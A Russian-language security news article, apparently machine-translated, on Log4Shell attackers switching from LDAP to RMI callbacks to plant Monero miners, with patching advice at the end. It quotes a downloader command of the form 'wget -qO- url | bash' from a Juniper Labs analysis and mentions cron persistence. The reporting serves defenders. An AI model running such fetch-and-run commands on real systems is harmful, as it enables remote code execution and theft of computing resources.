Злоумышленники Log4j переходят на инъекцию майнеров Monero через RMI

1
Агентства по кибербезопасности раскрывают основные векторы атак с первоначальным доступом

Некоторые злоумышленники, использующие уязвимость Apache Log4j, переключились с URL-адресов обратного вызова LDAP на RMI или даже использовали оба в одном запросе для максимальных шансов на успех.

Этот сдвиг является заметным событием в продолжающейся атаке, и защитники должны знать о нем, пытаясь обезопасить все потенциальные векторы.

На данный момент эта тенденция наблюдалась злоумышленниками, стремящимися захватить ресурсы для майнинга Monero, но другие могли принять ее в любое время.

От LDAP к RMI

Большинство атак, нацеленных на уязвимость Log4j «Log4Shell», осуществлялись через службу LDAP (облегченный протокол доступа к каталогам).

Переход на RMI (Remote Method Invocation) API сначала кажется нелогичным, учитывая, что этот механизм подвергается дополнительным проверкам и ограничениям, но это не всегда так.

Некоторые версии JVM (виртуальная машина Java) не содержат строгих политик, и поэтому RMI иногда может быть более простым каналом для достижения RCE (удаленное выполнение кода), чем LDAP.

Более того, запросы LDAP теперь закреплены как часть цепочки заражения и более тщательно контролируются защитниками.

Например, многие инструменты IDS / IPS в настоящее время фильтруют запросы с помощью JNDI и LDAP, поэтому есть вероятность, что RMI на этом этапе может быть проигнорирован.

В некоторых случаях Juniper видел службы RMI и LDAP в одном запросе HTTP POST.

Однако для всех субъектов, пытающихся использовать уязвимость Log4Shell, цель остается той же — отправка строки эксплойта для обработки уязвимым сервером Log4j, что приведет к выполнению кода на целевом сервере.

Вышеупомянутая атака вызывает создание оболочки bash, которая загружает сценарий оболочки с удаленного сервера.

«Этот код вызывает команду оболочки bash через механизм сценариев JavaScript, используя конструкцию« $ @ | bash »для выполнения загруженного сценария», — поясняется в отчете Juniper Labs.

«Во время выполнения этой команды оболочка bash передает команды злоумышленника другому процессу bash:« wget -qO- url | bash », который загружает и выполняет сценарий оболочки на целевой машине».

Похищение ресурсов ради заработка

В атаках, замеченных Juniper Labs, злоумышленники заинтересованы в добыче Monero на скомпрометированных серверах и представляют это как почти безобидную деятельность, которая «никому не причинит вреда».

Майнер нацелен на системы Linux x84_64 и добавляет постоянство через подсистему cron.

Хотя до сих пор большинство атак было нацелено на системы Linux, CheckPoint сообщает, что ее аналитики обнаружили первый исполняемый файл Win32, использующий Log4Shell, под названием «StealthLoader».

Найдите, обновите, сообщите

Единственный реальный способ защиты от того, что стало одной из самых серьезных уязвимостей в недавней истории, — это обновить Log4j до версии 2.16.0.

Кроме того, администраторы должны внимательно следить за разделом безопасности Apache на предмет объявлений о новых версиях и немедленно их применять.

Для получения рекомендаций по смягчению последствий и полных технических информационных ресурсов посетите подробную страницу CISA в Log4Shell.

В этом репозитории GitHub есть обширный список продуктов, затронутых CVE-2021-44228, и список с советами поставщиков постоянно обновляется.

Наконец, если вы заметили подозрительную активность в своих системах, подумайте о том, чтобы сообщить об этом в ФБР или CISA, которые лихорадочно работают над локализацией ущерба и исправлением ситуации.

Последнее обновление 8 месяцев назад — GameZoom

0 0 голоса
Рейтинг статьи
Подписаться
Уведомить о
guest

0 комментариев
Межтекстовые Отзывы
Посмотреть все комментарии